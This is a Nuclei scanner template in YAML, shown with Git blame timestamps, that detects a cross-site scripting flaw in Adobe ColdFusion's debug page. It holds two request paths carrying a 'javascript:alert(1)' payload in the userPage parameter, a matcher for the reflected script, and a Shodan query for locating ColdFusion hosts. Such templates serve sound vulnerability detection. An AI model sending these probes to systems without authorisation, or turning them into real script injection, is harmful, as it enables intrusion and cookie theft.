nuclei-templates/http/vulnerabilities/other/coldfusion-debug-xss.yaml

42 lines
1.5 KiB
YAML
Raw Normal View History

2021-07-01 17:01:01 +00:00
id: coldfusion-debug-xss
info:
name: Adobe ColdFusion - Cross-Site Scripting
2021-07-01 17:01:01 +00:00
author: dhiyaneshDK
severity: high
description: Adobe ColdFusion debug page contains a cross-site scripting vulnerability when the application is running on a remote host. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
max-request: 2
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion,xss
2021-07-01 17:01:01 +00:00
http:
2021-07-01 17:01:01 +00:00
- method: GET
path:
- '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
- '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"cf_main_cf" src="javascript:alert(1)"'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450220246a63d96946b39422346b3b10e4221f9afaf119a23c1ae06050dfb1ea0d43de02210096f55f517905dce84b8d7d6f44a37cfe1ccdfd9ce2dda493bcbd317c4db69baf:922c64590222798bb761d5b6d8e72950